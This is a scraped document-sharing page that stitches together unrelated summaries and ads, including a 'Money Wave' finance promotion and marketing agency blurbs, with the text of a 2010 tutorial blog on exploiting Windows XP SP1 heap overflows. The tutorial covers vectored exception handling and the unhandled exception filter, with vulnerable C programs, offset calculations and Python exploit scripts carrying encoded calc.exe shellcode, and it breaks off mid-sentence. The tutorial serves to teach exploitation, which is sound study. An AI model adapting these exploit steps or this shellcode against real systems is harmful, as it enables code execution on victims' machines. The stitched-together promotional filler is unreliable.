This document discusses exploiting heap overflows on Windows XP using vectored exception handling. It begins by explaining how the Windows heap works and how heap overflow vulnerabilities can be used to arbitrarily overwrite memory. It then presents a proof-of-concept C program that triggers a heap overflow and calls an exception handler. By overwriting pointers in the vectored exception handling data structures, execution can be redirected to shellcode placed in the heap buffer. The document provides step-by-step instructions for analyzing the vulnerability in a debugger, calculating offsets, and crafting an exploit to launch calc.exe via the heap overflow.
This document summarizes how to encrypt a ZIP file as a valid PNG file using AES in CBC mode. It describes:
1. The first block of the ZIP file and the target PNG header/chunk that will be encrypted to.
2. Decrypting the first cipher block to obtain the IV by xoring the plaintext and ciphertext blocks.
3. Using the key and crafted IV, the ZIP file can be encrypted such that it decrypts to a valid PNG file, taking advantage of flexible file formats and CBC mode properties.
The document discusses C++11 smart pointers including std::shared_ptr, std::unique_ptr, and std::weak_ptr. It provides an overview of their features and usage including shared ownership, unique ownership, no ownership. It demonstrates how to use them through examples and discusses best practices such as using std::make_shared to allocate objects, avoiding raw pointers, and enabling shared_from_this.
OpenGL® ES is a royalty-free, cross-platform API for full-function 2D and 3D graphics on embedded systems - including consoles, phones, appliances and vehicles. It consists of well-defined subsets of desktop OpenGL, creating a flexible and powerful low-level interface between software and graphics acceleration. OpenGL ES includes profiles for floating-point and fixed-point systems and the EGL™ specification for portably binding to native windowing systems. OpenGL ES 1.X is for fixed function hardware and offers acceleration, image quality and performance. OpenGL ES 2.X enables full programmable 3D graphics.
Smart pointers help solve memory management issues like leaks by automatically freeing memory when an object goes out of scope. They support the RAII idiom where resource acquisition is tied to object lifetime. Common smart pointers include std::shared_ptr, std::unique_ptr, std::weak_ptr, which help avoid leaks from exceptions or cycles in object graphs. make_shared is preferable to separate allocation as it can allocate the object and control block together efficiently in one allocation.
This document contains an exam for an ECE/CS course covering PIC18 assembly language programming. It includes multiple choice and short answer questions testing knowledge of topics like bitwise operations, conditional statements, loops, functions, pointers, and memory addressing modes. Students are asked to write code snippets and fill in memory locations after given C code executions.
Catch blocks allow you to handle exceptions in C++. You can catch specific exception types or catch all exceptions using catch(...). When an exception is caught, an optional variable name can be used to access the thrown object. A catch block can only catch objects with accessible copy constructors. The throw expression throws an exception, and the type cannot be incomplete. If a catch block cannot handle the exception, it can be rethrown to the next enclosing try block using a throw statement without arguments.
Checking Intel IPP Samples for Windows - ContinuationPVS-Studio
The progress keeps on going. My favorite static code analyzer PVS-Studio is developing too. It has occurred to me recently that those projects we already checked, we can well check again. It would be strange if we wrote articles on this topic, and they would hardly be interesting. But I think we can write one: it will become one more argument for the idea that you can get real benefit from static analysis only using it regularly and not from time to time. So, let's see what new interesting things we have managed to find in the Intel IPP Samples project.
The document discusses Boost.Interfaces, a C++ library that allows defining interfaces and implementing them in classes. It motivates the need for interfaces by describing problems with existing approaches like templates. It then explains how Boost.Interfaces works, including defining an interface with BOOST_IDL, implementing interfaces in classes, and calling interface methods through reference types.
JSUG - Effective Java Puzzlers by Christoph PicklChristoph Pickl
The document summarizes an agenda for a meeting on Effective Java Puzzlers. The agenda includes:
1. Discussing the books Effective Java and Java Puzzlers.
2. Having attendees solve puzzles individually.
3. Going through puzzles together and providing solutions and background information.
4. Sharing good advice on being more effective.
5. Providing a summary of the meeting.
It's not your mother's C++ anymore. Manual memory management, tedious loops, difficult-to-use STL algorithms -- are all a thing of the past now. The new C++ 11 standard contains a huge number of improvements to the C++ core language and standard library, and can help C++ developers be more productive.
In this session we will discuss the major features of C++ 11, including lambda functions, type inference for local variables, range-based for loops, smart pointers, and more. We will see how to use these features effectively to modernize your existing C++ programs and how to develop in the modern C++ style.
PVS-Studio delved into the FreeBSD kernelPVS-Studio
The document summarizes the author's analysis of the FreeBSD kernel source code using the PVS-Studio static analysis tool. Some key findings include:
1) Over 1000 potential errors were detected by the analyzer, including many typos, copy-paste errors, and issues involving incorrect logical expression evaluations due to operator precedence.
2) Many of the warnings pointed to real bugs, such as identical subexpressions compared using equality operators, equivalent code in "if-else" blocks, and recurring checks of the same condition.
3) Macros were found to cause issues by altering expression evaluation order, highlighting the importance of operator precedence.
4) Examples of specific errors are provided to demonstrate common bugs like
This document provides information about PHP (Hypertext Preprocessor), which is a server-side scripting language used for web development. It discusses that PHP scripts are executed on the server, PHP supports many databases, and it is an open source software. The document also explains why PHP is used, where to start with PHP, basic PHP syntax, variables, operators, conditional statements, loops, arrays, functions, forms, connecting to databases, and creating databases and tables. It provides examples of PHP code for many of these concepts to demonstrate how PHP works.
••• Learn how to safely manage memory with smart pointers! •••
In this presentation you will learn:
▸ the dangers of using raw pointers for dynamic memory
▸ the difference between unique_ptr, shared_ptr, weak_ptr
▸ how to use factories to increase safety and performance
▸ when raw pointers are still needed
Characteristics of Java and basic programming constructs like Data types, Variables, Operators, Control Statements, Arrays are discussed with relevant examples
The document provides an overview of core Java concepts including try-catch blocks, reading input from the keyboard, control flow statements like if-else and switch, looping with for, while, and do-while loops, arrays, inheritance, overriding, abstract classes, interfaces, and packages. It includes code examples and discusses concepts like exception handling, control flow, looping, arrays, object-oriented programming principles of inheritance and polymorphism.
The document discusses various techniques for writing clean code, including formatting code consistently, using meaningful names, writing comments to explain intent, keeping functions focused on single tasks, limiting class and method complexity, and avoiding hardcoded values. It emphasizes habits like adhering to coding standards as a team and writing unit tests. Specific techniques mentioned include consistent formatting, searchable names, avoiding comments as a crutch, limiting function parameters and nesting depth, and preferring classes with cohesive responsibilities. The document recommends several coding standards and style guides.
The document is an invitation to a baby shower on February 28, 2009. It provides directions and details about accommodations at a rustic guest house near the ocean, offering fishing, snorkeling, massages and boat transportation. The host asks recipients to RSVP and confirm if they will attend along with how many guests they will bring.
The document provides an overview of the life sciences industry in the North of England. It highlights that the North of England has 15 highly ranked universities and over 600 life sciences companies. It is home to world-class biomedical companies and has a large skilled workforce in science and technology. The region has strong research capabilities, including the UK Centre for Tissue Engineering and the National Biomanufacturing Centre. Manchester in particular has strengths in cancer research through institutions like the Christie Hospital NHS Trust and Manchester Cancer Research Centre.
2 Danes 3 Internationals - Marketing strategy for startups @ CBS danieldamian
Team members:
Daniel Damian - Romania (presenting)
Malene Christiansen - Denmark (presenting)
Jenny Wiinberg - Sweden
Maria Jensen Guy - Denmark
Ruyi Qian -China
This document provides an overview of test-driven development (TDD) and discusses:
- The key steps of TDD including writing a test, seeing it fail, writing code to pass the test, and refactoring.
- Popular Python testing tools like unittest, nose, pytest, and sure that can be used for TDD.
- How TDD is applied to JavaScript/CoffeeScript using frameworks like Mocha, Should.js, and Expect.js.
- The benefits of TDD including early detection of errors, improved design, and serving as documentation for code changes.
The document discusses exploiting a buffer overflow vulnerability in Internet Explorer's VML implementation (MS06-055) to execute arbitrary code. It describes overwriting the structured exception handler to gain control of the instruction pointer, using heap spraying to load a buffer in memory, and having the instruction pointer jump to the buffer to execute shellcode and spawn a command shell. Metasploit is introduced as an open-source framework for developing exploits.
The document discusses exploiting heap overflows on the Windows platform. It describes the Windows heap structure and design, how heap overflows corrupt the heap control information, and several techniques for exploiting heap overflows including repairing the heap, using the unhandled exception filter, vectored exception handling, overwriting pointers in the process environment block, and overwriting the thread environment block exception handler pointer.
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsAjin Abraham
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
This presentation was presented at IT Audit & IT Security Meetup #4 at Indonesian Cloud, Jakarta.
The exploit development process was quite challenging and we think that it's worth to share.
For educational purposes only.
This document discusses techniques that malware authors use to frustrate malware analysts, including inserting breakpoints, manipulating timing functions, exploiting Windows internals like debug flags and objects, anti-dumping methods, VM detection, and debugger-specific tricks. The author also announces a public malware repository and API called VXCage for sharing samples.
44CON London 2015 - How to drive a malware analyst crazy44CON
This document discusses techniques that malware authors use to frustrate malware analysts, including inserting breakpoints, manipulating timing functions, exploiting Windows internals, anti-dumping measures, and virtual machine detection. The author then provides recommendations for malware analysts to identify and circumvent these anti-analysis techniques.
[CCC-28c3] Post Memory Corruption Memory AnalysisMoabi.com
The document summarizes the Post Memory Corruption Memory Analysis (PMCMA) tool. PMCMA allows finding and testing exploitation scenarios resulting from invalid memory accesses. It provides a roadmap to exploitation without generating exploit code. The tool analyzes programs after crashes to overwrite memory locations in forked processes and test impact on execution flow.
The document summarizes the process of reversing the source code of a virtual machine (VM) used in the T2'06 challenge. It identifies key structures like the VM context, instruction pointer, opcode table, and instruction decoder. It analyzes individual VM instructions to understand operations like incrementing the instruction pointer. The author maps out the VM's memory management and "machine control" registers used for I/O and error handling. Reversing the full VM source code provides insights into how VMs work and how to approach reversing complex VM protections.
This document discusses how debugger modules and plugins like Byakugan can help speed up the basic exploit development process. It provides an example using Byakugan to develop an exploit for a vulnerability in BlazeDVD in just one crash. Byakugan is loaded in WinDbg and used to find the offset to EIP when triggering the crash with a Metasploit pattern, identifying it as an SEH exploit. Byakugan's searchOpcode function finds a suitable pop pop ret, which is then used to build the exploit payload to launch calc.exe and demonstrate successful exploitation in a single run.
This document discusses how debugger modules and plugins like Byakugan can help speed up the basic exploit development process. It provides an example using Byakugan to develop an exploit for a vulnerability in BlazeDVD in just one crash. Byakugan is loaded in WinDbg and used to find the offset to EIP when providing a crash payload containing a Metasploit pattern. This offset is then used to build a working exploit targeting the stack-based buffer overflow in under 30 lines of code, demonstrating how Byakugan can accelerate the process of developing an initial exploit.
Linux has this great tool called strace, on OSX there’s a tool called dtruss - based on dtrace. Dtruss is great in functionality, it gives pretty much everything you need. It is just not as nice to use as strace. However, on Linux there is also ltrace for library tracing. That is arguably more useful because you can see much more granular application activity. Unfortunately, there isn’t such a tool on OSX. So, I decided to make one - albeit a simpler version for now. I called it objc_trace.
SFO15-500: VIXL
Speaker: Amaury Le Leyzour
Date: September 25, 2015
★ Session Description ★
VIXL is dynamic code generation toolkit for ARMv8 that we hope will enable JIT creators to rapidly target the ARM instruction set.
Over the past few years we (the ARM JIT team) have worked on the code generators of many of the leading JIT compilers for the JavaScript and Java languages. During that time we built up a strong knowledge base on some of the pitfalls and time-sinks involved in creating a good JIT compiler backend. This led us to develop some tools to help improve our productivity. With ARM announcing the new Cortex-A range of processors supporting the AArch64 execution state we decided that we would focus our efforts on A64 tooling to enable developers to rapidly port programming language virtual machines for this new processor range. Soon after we decided to support Aarch32 as well.
This presentation will introduce you to what VIXL is, what’s new in VIXL and how to use it and take advantage of all its components that cover all the aspects of software development on ARM CPUs.
★ Resources ★
Video: https://www.youtube.com/watch?v=XxMTSO4clQY
Etherpad: pad.linaro.org/p/sfo15-500
Pathable: https://sfo15.pathable.com/meetings/303091
★ Event Details ★
Linaro Connect San Francisco 2015 - #SFO15
September 21-25, 2015
Hyatt Regency Hotel
http://www.linaro.org
http://connect.linaro.org
The document provides a basic guide to reverse engineering Linux x86 shellcode. It summarizes reversing two sample shellcodes: 1) A simple program that reads the /etc/passwd file by executing the cat command. By examining registers, it is determined the shellcode executes execve to read the file. 2) An XOR encrypted shellcode that decrypts itself before launching a ksh shell with root privileges using the setreuid system call. Breakpoints are used to stop and disassemble the shellcode at key points to understand its functionality.
This document provides an introduction and overview of embedded C programming for microcontrollers. It discusses C basics, the compilation process, C extensions for microcontrollers, variables, data types, statements, operators, functions, loops, decision making, interrupts, in-line assembly, and provides an example temperature display case study.
Shellcode Disassembling - Reverse EngineeringSumutiu Marius
This document provides a basic guide to reverse engineering Linux x86 shellcode. It summarizes reversing two sample shellcodes: 1) A simple shellcode that reads the /etc/passwd file, and 2) An XOR encrypted shellcode that launches a new ksh shell with root privileges. It explains breaking down the shellcode using a debugger to understand what it is doing by examining registers, system calls and related functions. The goal is to understand how the shellcode works rather than just trusting its described purpose.
The document discusses various techniques for anti-debugging including API based detection, process and thread block detection, hardware and register based detection, exception based detection, and modified code based detection. It provides examples of API based anti-debugging methods like FindWindow, IsDebuggerPresent, CheckRemoteDebuggerPresent, OutputDebugString, NtQueryInformationProcess, and NtSetInformationThread. The purpose of anti-debugging is to protect intellectual property by making reversing software more difficult through detection and hindering of debuggers.
This document discusses various low-level exploits, beginning with creating shellcode by extracting opcodes from a compiled C program. It then covers stack-based buffer overflows, including return-to-stack exploits and return-to-libc. Next it discusses heap overflows using the unlink technique, integer overflows, and format string vulnerabilities. The document provides code examples and explanations of the techniques.
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source CodePVS-Studio
The document analyzes the source code of the SETI@home project using a static code analyzer. The analysis found relatively few errors, indicating high code quality. Some issues discussed include incorrect operator precedence leading to logic errors, empty methods that should return values, pointer dereferencing before checking for null, undefined behavior from negative number shifts, and inefficient string length calls in loops. Overall the review uncovered some minor defects but showed the code is generally well written.
The Money Wave 2024 Review_ Is It the Key to Financial Success.pdfnirahealhty
What is The Money Wave?
The Money Wave is a comprehensive financial program designed to equip individuals with the knowledge and tools necessary for achieving financial independence. It encompasses a range of resources, including educational materials, webinars, and community support, all aimed at helping users understand and leverage various financial opportunities.
➡️ Click here to get The Money Wave from the official website.
Key Features of The Money Wave
Educational Resources: The Money Wave offers a wealth of educational materials that cover essential financial topics, including budgeting, investing, and wealth-building strategies. These resources are designed to empower users with the knowledge needed to make informed financial decisions.
Expert Guidance: Users gain access to insights from financial experts who share their experiences and strategies for success. This guidance can be invaluable for individuals looking to navigate the complexities of personal finance.
Community Support: The program fosters a supportive community where users can connect with like-minded individuals. This network provides encouragement, accountability, and shared experiences that can enhance the learning process.
Actionable Strategies: The Money Wave emphasizes practical, actionable strategies that users can implement immediately. This focus on real-world application sets it apart from other financial programs that may be more theoretical in nature.
Flexible Learning: The program is designed to accommodate various learning styles and schedules. Users can access materials at their convenience, making it easier to integrate financial education into their daily lives.
Benefits of The Money Wave
Increased Financial Literacy: One of the primary benefits of The Money Wave is the enhancement of financial literacy. Users learn essential concepts that enable them to make better financial decisions, ultimately leading to improved financial health.
Empowerment: By providing users with the tools and knowledge needed to take control of their finances, The Money Wave empowers individuals to take proactive steps toward achieving their financial goals.
Networking Opportunities: The community aspect of The Money Wave allows users to connect with others who share similar financial aspirations. This network can lead to valuable partnerships, collaborations, and support systems.
Long-Term Success: The strategies taught in The Money Wave are designed for long-term success. Users are encouraged to adopt a mindset of continuous learning and growth for sustained financial well-being.
Accessibility: With its online format, The Money Wave is accessible to anyone with an internet connection. This inclusivity allows individuals from various backgrounds to benefit from the program.
This guide explains how businesses can prepare for and respond to Disaster Recovery IT Services Orange County. It covers the basics of keeping important data safe, quickly recovering systems after problems, and minimizing downtime to ensure business operations continue smoothly.
Learn More: https://skywardit.com/services/
How Can Microsoft Office 365 Improve Your Productivity?Digital Host
Microsoft Office 365 is a cloud-based subscription service offering essential productivity tools. It includes Word for documents, Excel for data analysis, PowerPoint for presentations, Outlook for email, OneDrive for cloud storage, and Teams for collaboration. Key benefits are accessibility from any device, advanced security, and regular updates. Office 365 enhances collaboration with real-time co-authoring and Teams, streamlines communication with Outlook and Teams Chat, and improves data management with OneDrive and SharePoint. For reliable office 365 hosting, Digital Host offers various subscription plans, setup support, and training resources. Visit https://www.digitalhost.com/email-office/office-365/
THE SOCIAL STEM- #1 TRUSTED DIGITAL MARKETING COMPANYthesocialstem05
WELCOME TO DIGITAL WORLD!
THE SOCIAL STEM, #1 trusted digital marketing company in jalandhar, is a trusted digital partner.
As DIGITAL THINKERS, social stem is dedicated to enhancing the presence of your business digitally, so get ready to dive in the ocean of digital world.
THE SOCIAL STEM offers a full range of Digital Marketing Services including SEO, SMO, PPC, website designing, web development,Content marketing, and many more.
We at social stem know how to boost your online presence and announce your brand to millions of customers.
At THE SOCIAL STEM, we are passionate about harnessing the power of digital marketing to elevate brands and drive business success. Our expert platoon is dedicated to creating customized strategies that align with your goals and drive measurable results.
From SEO and content marketing to social media management and PPC campaigns, we utilize a multifaceted approach to ensure your brand stands out in the digital landscape.
OUR VISION AND MISSION
THE SOCIAL STEM#1 trusted digital marketing company in jalandhar visions to become the leading digital marketing company in Jalandhar, renowned for our innovative strategies, extraordinary customised services and superlative results.
THE SOCIAL STEM#1 trusted digital marketing company in jalandhar mission is to provide our clients with expert digital solutions that drive ROI.We also empower businesses by enhancing their online visibility and turning into loyal customers. We endeavour to create customised marketing strategies, aligning with our clients’ goals, ensuring sustainable growth and success.
Nomad Internet: Leading Internet Provider for Rural Areas in the USANomad Internet
Nomad Internet specializes in delivering reliable, high-speed wireless internet to rural areas and travelers across the United States. Whether you're in a remote location or on the move, our flexible plans and exceptional customer support ensure you stay connected wherever you are. Experience seamless internet access with Nomad Internet, designed to meet the unique needs of rural and traveling users.
Internet Celebrities and Purposeful Content Creationsilnan
This presentation is my proposal for my 2025 South-by-Southwest (#SxSW2025) Book Reading. There will be an overview of the the three parts of my new book "Digital Culture in the Platform Era: Studying influence, celebrity, and superstars online." Specifically, this overview will focus on the different personality types that drive online engagement, the purposeful content that one creates to connect with their community, and how we reach online to be meaningful to others.
DataVinci: Expert Google Analytics Agency offering GA4 Consulting Services, GTM Consulting Services, and CRO solutions to elevate your digital strategy and optimize conversions.
WTF is Food Journalism? An introduction to Food MediaDamian Radcliffe
Slides from the introductory class of my Food Journalism in France class, as part of a study abroad program in summer 2024. https://geo.uoregon.edu/programs/europe-france/food-journalism-france
1. 1
mr_me's IT security blog
Exploiting, Reversing, Fuzzing, Code Analysis and Web Application Security
Heap Overflows For Humans – 101
mr_me · Sunday, October 24th, 2010
We have talked previously about stack based buffer overflows and format strings
vulnerabilities. Now it is time to take it a step further and play with the windows heap
manager!
Unlink() to execute a write 4 primitive
Previously, with stack overflows, we have gained control of the execution pointer (EIP)
some how whether that be through the exception handler or directly. Today we are
going to discuss a series of techniques that have been tried and tested in time that
gain control of execution without directly using EIP or SEH. By overwriting at a
location in memory of our choice, with a controlled value, we are able to achieve an
arbitary DWORD overwrite.
If you are unfamilair with stack based buffer overflows to an intermediate/advanced
level then it is suggested that you focus in this area first. What we are about to cover,
has been dead and buried for a while, so if you are looking for newer techniques to
exploit the windows heap manager, dont stick around
What you will need:
Windows XP with just sp1 installed.q
A debugger (Olly Debugger, Immunity Debugger, windbg etc).q
A c/c++ compilier (Dev C++, lcc-32, MS visual C++ 6.0 (if you can still get it)).q
A scripting language of ease (I use python, maybe you can use perl).q
A brain (and/or persistance).q
Some knowledge of Assembly, C and knowledge on how to dig through a debuggerq
HideDbg under Olly Debugger (plugin) or !hidedebug under immunity debuggerq
Time.q
We are going to focus on the core basics and fundementals. The techniques presented
will most probably be too old to use in the “real world” however it must always be
reminded that if you want to move forward, one must know the past. And learn from it.
Ok lets begin!
What is the heap and how does it work under XP?
mr_me's IT security blog - 1 / 12 - 10.01.2011
2. 2
The heap is a storage of area where a process can store data. Each process
dynamically allocates and deallocates heap memory based on the requirements of the
application and are globally accessible. It is important to point out that the stack
grows towards 0×00000000 and yet the heap grows towards 0xFFFFFFFF. This
means that if a process was to call HeapAllocate() twice, the second call would return
a pointer that is higher than the first. Therefore any overflow of the first block will
overflow into the second block.
Every process whether its the default process heap or a dynamically allocated heap
will contain multiple data structures. One of those data structures is an array of 128
LIST_ENTRY structures that keeps track of free blocks. This is known as the
FreeLists. Each list entry holds two pointers and the beginning of this array can
be found at offset 0×178 bytes into the heap structure. When a heap is created, two
pointers which point to the first free block of memory available for allocation are
set at FreeLists[0]. At the address that these two pointers point to (The beginning of
the first available block) are two pointers that point to FreeLists[0].
Let that sink in, and then think about this.
Assuming we have a heap with a base address of 0×00650000 and the first availble
block is located at 0×00650688 then we can assume the following four addresses:
At address 0×00650178 (Freelist[0].Flink) is a pointer with the value of 0×006506881.
(Our first free block)
A address 0x006517c (FreeList[0].Blink) is a pointer with the value of 0×00650688 (Our2.
first free block)
At address 0×00650688 (Our first free block) is a pointer with the value of 0×006501783.
(FreeList[0])
At address 0x0065068c (Our first free block) is a pointer with the value of 0×006501784.
(FreeList[0])
When an allocation occurs, the FreeList[0].Flink and FreeList[0].Blink
pointers are updated to point to the next free block that will be allocated.
Furthermore the two pointers that point back to the FreeList are moved to the
end of the newly allocated block. Every allocation or free, these pointers are
updated. Therefore, these allocations are tracked in a doubly linked list.
When a heap buffer is overflowed into the heap control data, the updating of these
pointers allows the arbitrary dword overwrite. An attacker at this point has the
opportunity to modify program control data such as function pointers and thus gain
control of the processes path of execution.
Exploiting Heap Overflows using Vectored Exception
Handling
First, lets begin with our heap-veh.c code:
mr_me's IT security blog - 2 / 12 - 10.01.2011
3. 3
<br />
#include <windows.h><br />
#include <stdio.h></p>
<p> DWORD MyExceptionHandler(void);<br />
int foo(char *buf);</p>
<p> int main(int argc, char *argv[])<br />
{<br />
HMODULE l;<br />
l = LoadLibrary("msvcrt.dll");<br />
l = LoadLibrary("netapi32.dll");<br />
printf("nnHeapoverflow program.n");<br />
if(argc != 2)<br />
return printf("ARGS!");<br />
foo(argv[1]);<br />
return 0;<br />
}</p>
<p> DWORD MyExceptionHandler(void)<br />
{<br />
printf("In exception handler....");<br />
ExitProcess(1);<br />
return 0;<br />
}</p>
<p> int foo(char *buf)<br />
{<br />
HLOCAL h1 = 0, h2 = 0;<br />
HANDLE hp;</p>
<p> __try{<br />
hp = HeapCreate(0,0x1000,0x10000);<br />
if(!hp){<br />
return printf("Failed to create heap.n");<
br />
}<br />
h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);</p>
<p> printf("HEAP: %.8X %.8Xn",h1,&h1);</p>
<p> // Heap Overflow occurs here:<br />
strcpy(h1,buf);</p>
<p> // This second call to HeapAlloc() is when we gain con
trol<br />
h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);<br />
printf("hello");<br />
}<br />
__except(MyExceptionHandler())<br />
{<br />
printf("oops...");<br />
}<br />
return 0;<br />
}
mr_me's IT security blog - 3 / 12 - 10.01.2011
4. 4
From the above code, we can see that their will be exception handling due to the __try
block statement. Begin by compiling the code with your favourite ompiler under
Windows XP SP1.
Run the application on the command line, notice how it takes over 260 bytes as an
argv and the exception handler kicks in.
Now of course when we run this in the debugger, we gain control of the second
allocation (because freelist[0] is being updated with our attack string from the first
allocation). Look:
MOV DWORD PTR DS:[ECX],EAX
MOV DWORD PTR DS:[EAX+4],ECX
These instructions are saying “Make the current value of EAX the pointer of ECX and
make the current value of ECX the value of EAX at the next 4 bytes”. From this we
know we are unlinking or freeing of the first allocated memory block. So essentially it
means:
EAX (what we write) : Blink1.
ECX (location of where to write) : Flink2.
So what is the vectored exception handling?
vectored exception handling was introduced to windows XP when it was first released
and stores exception registration structures on the heap. Unlike traditional frame
exception handling such as SEH that stores its structure on the stack. This type of
exception is called before any other frame based exception handling, The following
struture dispicts the layout:
struct _VECTORED_EXCEPTION_NODE<br />
{<br />
DWORD m_pNextNode;<br />
mr_me's IT security blog - 4 / 12 - 10.01.2011
5. 5
DWORD m_pPreviousNode;<br />
PVOID m_pfnVectoredHandler;<br />
}
All that you need to know is that the m_pNextNode points to the next
_VECTORED_EXCEPTION_NODE structure therefore we must overwrite the pointer to
_VECTORED_EXCEPTION_NODE (m_pNextNode) with our fake pointer. But what do
we overwrite it with? lets take a look at the code that is responsible for dispatching
the _VECTORED_EXCEPTION_NODE:
77F7F49E 8B35 1032FC77 MOV ESI,DWORD PTR DS:[77FC3210]
77F7F4A4 EB 0E JMP SHORT ntdll.77F7F4B4
77F7F4A6 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
77F7F4A9 50 PUSH EAX
77F7F4AA FF56 08 CALL DWORD PTR DS:[ESI+8]
so we MOV the pointer of _VECTORED_EXCEPTION_NODE into ESI and then shortly
after we call ESI + 8. If we set the next pointer of _VECTORED_EXCEPTION_NODE to
our a pointer of our shellcode – 0×08, then we should land very neatly into our buffer.
Where do we find a pointer to our shellcode? Well there is one on the stack :0) see:
We can see our pointer to our shellcode on the stack. Ok no stress, lets use this
hardcoded value 0x0012ff40. Except remember the call esi+8? well lets make sure we
hit right on target for our shellcode so 0x0012ff40 – 0×08 = 0x0012ff38. Excellant so
ECX is going to be set to 0x0012ff38.
How do we find the m_NextNode (pointer to next _VECTORED_EXCEPTION_NODE)?
Well in Olly (or immunity debugger) we can parse our exception so far using shift+f7
and try and continue the through the code. The code will setup for the call to the first
_VECTORED_EXCEPTION_NODE and as such will reveal the pointer at:
77F60C2C BF 1032FC77 MOV EDI,ntdll.77FC3210
77F60C31 393D 1032FC77 CMP DWORD PTR DS:[77FC3210],EDI
77F60C37 0F85 48E80100 JNZ ntdll.77F7F485
You can see that the code is moving the m_pNextNode (our pointer that we need) into
EDI. Excellant, lets set EAX to that value.
mr_me's IT security blog - 5 / 12 - 10.01.2011
6. 6
So as it stands, we have the following values set:
ECX = 0x77fc3210
EAX = 0x0012ff38
But of course we need our offsets to EAX and ECX, so we just create an MSF pattern
and feed it into the application. Here is a quick reminder for your viewing pleasure:
Step 1 – Create msf pattern.
Step 2 – Feed it to the target application
Step 3 – Calculate offsets by turning on anti-debugging and triggering the exception
Ok so here is a skeleton PoC exploit:
<br />
import os<br />
# _vectored_exception_node<br />
mr_me's IT security blog - 6 / 12 - 10.01.2011
7. 7
exploit = ("xcc" * 272)<br />
# ECX pointer to next _VECTORED_EXCEPTION_NODE = 0x77fc3210 - 0x04<br
/>
# due to second MOV writes to EAX+4 == 0x77fc320c<br />
exploit += ("x0cx32xfcx77") # ECX<br />
# EAX ptr to shellcode located at 0012ff40 - 0x8 == 0012ff38<br />
exploit += ("x38xffx12") # EAX - we dont need the null b
yte<br />
os.system('"C:Documents and SettingsSteveDesktopodbg110
OLLYDBG.EXE" heap-veh.exe ' + exploit)<br />
Now at this stage we cannot have shellcode after our ECX instruction because it
contains a null byte, you may remember this from my previous tutorial Debugging an
SEH 0day. This may not always be the case as in this example we are using a strcpy to
store our buffer in the heap.
Ok so at this point we hit out software breakpoints at “xcc” and can simply replace
this with some shellcode. The shellcode must not be more than 272 bytes as this is the
only spot to place our shellcode.
<br />
# _vectored_exception_node<br />
import os<br />
import win32api<br />
calc = ("xdaxcbx2bxc9xd9x74x24xf4x58xb1x32xbbxfaxc
d" +<br />
"x2dx4ax83xe8xfcx31x58x14x03x58xeex2fxd8xb6"
+<br />
"xe6x39x23x47xf6x59xadxa2xc7x4bxc9xa7x75x5c"
+<br />
"x99xeax75x17xcfx1ex0ex55xd8x11xa7xd0x3ex1f"
+<br />
"x38xd5xfexf3xfax77x83x09x2ex58xbaxc1x23x99"
+<br />
"xfbx3cxcbxcbx54x4ax79xfcxd1x0ex41xfdx35x05"
+<br />
"xf9x85x30xdax8dx3fx3ax0bx3dx4bx74xb3x36x13"
+<br />
"xa5xc2x9bx47x99x8dx90xbcx69x0cx70x8dx92x3e"
+<br />
"xbcx42xadx8ex31x9axe9x29xa9xe9x01x4ax54xea"
+<br />
"xd1x30x82x7fxc4x93x41x27x2cx25x86xbexa7x29"
+<br />
"x63xb4xe0x2dx72x19x9bx4axffx9cx4cxdbxbbxba"
+<br />
"x48x87x18xa2xc9x6dxcfxdbx0axc9xb0x79x40xf8"
+<br />
mr_me's IT security blog - 7 / 12 - 10.01.2011
8. 8
"xa5xf8x0bx97x38x88x31xdex3ax92x39x71x52xa3"
+<br />
"xb2x1ex25x3cx11x5bxd9x76x38xcax71xdfxa8x4e"
+<br />
"x1cxe0x06x8cx18x63xa3x6dxdfx7bxc6x68xa4x3b"
+<br />
"x3ax01xb5xa9x3cxb6xb6xfbx5ex59x24x67xa1x93")
</p>
<p>exploit = ("x90" * 5)<br />
exploit += (calc)<br />
exploit += ("xcc" * (272-len(exploit)))<br />
# ECX pointer to next _VECTORED_EXCEPTION_NODE = 0x77fc3210 - 0x04<br
/>
# due to second MOV writes to EAX+4 == 0x77fc320c<br />
exploit += ("x0cx32xfcx77") # ECX<br />
# EAX ptr to shellcode located at 0012ff40 - 0x8 == 0012ff38<br />
exploit += ("x38xffx12") # EAX - we dont need the null b
yte<br />
win32api.WinExec(('heap-veh.exe %s') % exploit, 1)<br />
Exploiting Heap Overflows using the Unhandled Exception
Filter
The Unhandler Exception Filter is the last exception to be called before an application
closes. It is responsible for dispatching of the very common message “An unhandled
error occured” when an application suddenly crashes. Up until this point, we have
gotten to the stage of controlling EAX and ECX and knowing the offset location to both
registers:
<br />
import os<br />
exploit = ("xcc" * 272)<br />
exploit += ("x41" * 4) # ECX<br />
exploit += ("x42" * 4) # EAX<br />
exploit += ("xcc" * 272)<br />
os.system('"C:Documents and SettingsSteveDesktopodbg110
OLLYDBG.EXE" heap-uef.exe ' + exploit)<br />
Unlike the previous example, our heap-uef.c file contains no traces of a custom
exception handler defined. This means we are going to exploit the application using
Microsofts default Unhandled Exception Filter. Below is the heap-uef.c file:
<br />
#include <stdio.h><br />
#include <windows.h></p>
<p> int foo(char *buf);<br />
int main(int argc, char *argv[])<br />
{<br />
mr_me's IT security blog - 8 / 12 - 10.01.2011
9. 9
HMODULE l;<br />
l = LoadLibrary("msvcrt.dll");<br />
l = LoadLibrary("netapi32.dll");<br />
printf("nnHeapoverflow program.n");<br />
if(argc != 2)<br />
return printf("ARGS!");<br />
foo(argv[1]);<br />
return 0;<br />
}</p>
<p> int foo(char *buf)<br />
{<br />
HLOCAL h1 = 0, h2 = 0;<br />
HANDLE hp;</p>
<p> hp = HeapCreate(0,0x1000,0x10000);<br />
if(!hp)<br />
return printf("Failed to create heap.n");<br /
>
h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);<br />
printf("HEAP: %.8X %.8Xn",h1,&h1);</p>
<p> // Heap Overflow occurs here:<br />
strcpy(h1,buf);</p>
<p> // We gain control of this second call to HeapAlloc<br />
h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);<br />
printf("hello");<br />
return 0;<br />
}<br />
When debugging this type of overflow, its important to turn anti debugging on within
